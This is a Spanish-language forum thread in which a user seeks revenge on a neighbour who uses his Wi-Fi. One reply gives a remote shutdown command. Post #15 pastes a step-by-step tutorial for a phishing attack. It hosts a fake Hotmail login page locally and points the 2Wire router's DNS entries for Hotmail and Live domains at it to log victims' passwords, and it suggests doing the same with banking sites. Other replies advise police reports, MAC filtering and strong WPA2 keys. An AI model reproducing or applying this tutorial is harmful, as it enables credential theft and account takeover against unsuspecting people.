leccion para ladron de wireless

sefes

Bovino adolescente
#1
hola a todos soy nuevo en este gran foro ( en serio ) çneceito ayuda con un individuo que me esta robando la señal inalambrica de mi router.
quiero darle una leccion par qu no se pase de listo

no se si es el lugar correcto

gracias sefes
 

sefes

Bovino adolescente
#3
yo lo hice y cambie de wpa a wpa2 y filtrado de mac y el hijo de 3 pesos se volvio a conectar

gracias como quiera se agradece
 

sefes

Bovino adolescente
#5
gracias chinicuillas
es de axtel

gracias blackotzin
mi querida y bien amada señora utiliza la lap y por eso del inalambrico
 
#7
Pues si tienes tu señal con candado y tienes ubicado al ladron puedes levantar un acta en tu delegacion por robo eso si le daria una buena leccion
 

sefes

Bovino adolescente
#8
quiero darle una leccion le dije al pen...sador de mier...coles le dije de la señal pero dijo mira mi lap pesca la señal y con eso no puedo hacer nada
lei en algun lado qe puedo bloquear su compu o resetearla no quiero dar lecciones de moral ni de etica pero este cabr...ito se lo gano
 

sefes

Bovino adolescente
#10
vi en algun lado que puedo resetearle la maquina entrando desde mi computadora o meterle un programa para poder ver lo que hace el muy cabron
creo que si le pongo una golpiza (ganas no faltan , ni fuerza ) se le quita a los 2 o 3 dias pero si le doy en mu madre a su maquina ahi va a sentir y darle una leccion a muy idiota por no pagar 200 o 300 pesos por una conexion o hasta menos que tenga que pagar mas or que le reparen su lap
 
#13
shutdown -s -m \\ip_del_equipo_remoto
las veces que gustes...
pero, como sabes que realmente se esta conectando? tu modem/router le asigna una direccion IP?
no sera que solo esta detectando la señal pero no navega a traves de ti?
puedes poner una imagenes donde demuestres que esta conectado a traves de tu conexion
saludos
 

sefes

Bovino adolescente
#14
al meterme al pclink y ver wireless sta... me aparecen 3 conexiones y solo tenemos lap y una de escritorio la cual esta conectada por cable
en una pagina me encontre como hackear el hotmail de la persona pero no se como hacerlo
paso por mp la direccion
 

sefes

Bovino adolescente
#15
leccion

esto no es mio lo encontre en una pag. y no tengo la masminimapincheidea de como ponerlo en funcion

me pudieran ayduar

Pues les dejo este super mega lamah tutorial ,que explica paso a paso como robarle las passwords de hotmail a tus vecinos si se cuelgan a tu 2wire (tambien puede funcionar con otros routers ,pero este tutorial esta enfocado al modem 2wire ,ya que es de los mas usados en todo mexico).

1-Descargate estos dos archivos www.podersupremo.com/PoderSupremo.rar y http://prdownloads.sourceforge.net/appserv/appserv-win32-2.5.10.exe?download ,luego descomprime el PoderSupremo.rar

2-Abre el archivo appserv-win32-2.5.10.exe te aparecera un mensaje de bienvenida de la instalacion ,solo ignoralo y dale en el boton Next,luego te preguntara en donde quieres intalarlo ,le dejas el default(C:\AppServ) y le das click en el boton Next.Despues te preguntara que paquetes quieres instalar ,deseleccionas los paquetes "MySQL database" y "phpMyAdmin" y le das click en Next.



Luego te preguntara el nombre que quieres que tenga tu server y la direccion de correo electronico.Solo tienes que poner www.hotmail.com y de mail el que sea.Y listo ya termino la instalacion.

3-Ahora extraes el PoderSuprem.rar en la carpeta C:\AppServ\www , luego abres tu explorador y te pones en la barra de direcciones http://localhost/ ,si todo salio bien , debe de aparecer algo similar a esto:



Luego para probar pones un correo y un password para probar,luego te vas a http://localhost/PoderSupremo.html ,y si todo salio bien ,te debe de aparecer algo similar a esto:



4- Te vas a http://home/ y seleccionas donde dice "Red Doméstica"



Luego buscas es el nombre de tu pc y das click en donde dice "ver detalles de dispositivo"


Luego copias la ip interna que aparece.



Luego te vas a http://home/xslt?PAGE=J38&THISPAGE=J01&NEXTPAGE=J38 ,pones tu contraseña del modem 2wire y te redireccionara a la consola de administración y diagnóstico del 2wire (especificamente en la seccion de dns)



Donde dice "Nombre de DNS" pones www.hotmail.com y donde dice "Direccion IP" pones la ip interna de red de tu pc.Ahora tienes que hacer lo mismo con los dominios mail.live.com hotmail.com login.live.com de tal manera que debe de quedar asi:



Listo ,ahora cada ves que tus vecinos que te roban el internet, teclen www.hotmail.com o hotmail.com o mail.live.com o login.live.com ,los redireccionara a una web falsa alojada en tu pc,que logeara la contraseña/mail que escriban en un archivo llamado PoderSupremo.html.
Tambien puedes hacer esto mismo pero con otros dominios ( por ejemplo banamex.com ), o incluso si conoces la url magica puedes usarla para resetear el password de los modems de los cibercafes y redireccionar los DNS a un servidor casero.


By PoderSupremo
 

Zephyros

Bovino de la familia
#16
quiero darle una leccion le dije al pen...sador de mier...coles le dije de la señal pero dijo mira mi lap pesca la señal y con eso no puedo hacer nada
lei en algun lado qe puedo bloquear su compu o resetearla no quiero dar lecciones de moral ni de etica pero este cabr...ito se lo gano
Ve a levantar un acta por invasión a la privacidad, ataque a las vias de comunicación y robo.
Verás si no se calma.

Estás en todo tu derecho de demandarlo porque está robando un bien privado (internet) que tú estás pagando.

Precisamente por cosas como esta, es que estoy en contra de los temas sobre hacking wireless por el medio que sea.
 

sefes

Bovino adolescente
#18
no hay forma de enterarme que es el ya que con tan solo no mostrar su lap o algo por el estilo ni el tiempo ni el dinero que se llevaria el poner la denuncia si ya he ensaado que mejor le parto su mandarina en gajos y se los meto por el cu...para que no este de mamon pero quisiera pegarle en el bolsillo asi si me reclama se chinga y entiende de una buena vez
pero como queira gracias
 

Matane

Bovino maduro
#19
configura tu router para que solo pueda acceder la MAC de las compus de tu casa.
ipconfig /all es el comando en el cmd pa' saber tu mac
 
#20
en realidad ... si pusiste la clave en wpa o wpa2... eso deberia ser suficiente a menos que pongas de clave "1" o algo asi, prueba con algo fuerte como "IHJDIJOABNABOLEMJCPA9714261-2_POITERHIUDFM" las unicas contraseñas que se pueden "robar" o conseguir de manera facil y rapida son las WEP, lo se, soy auditor de redes, a esto me dedico ;)
 
Arriba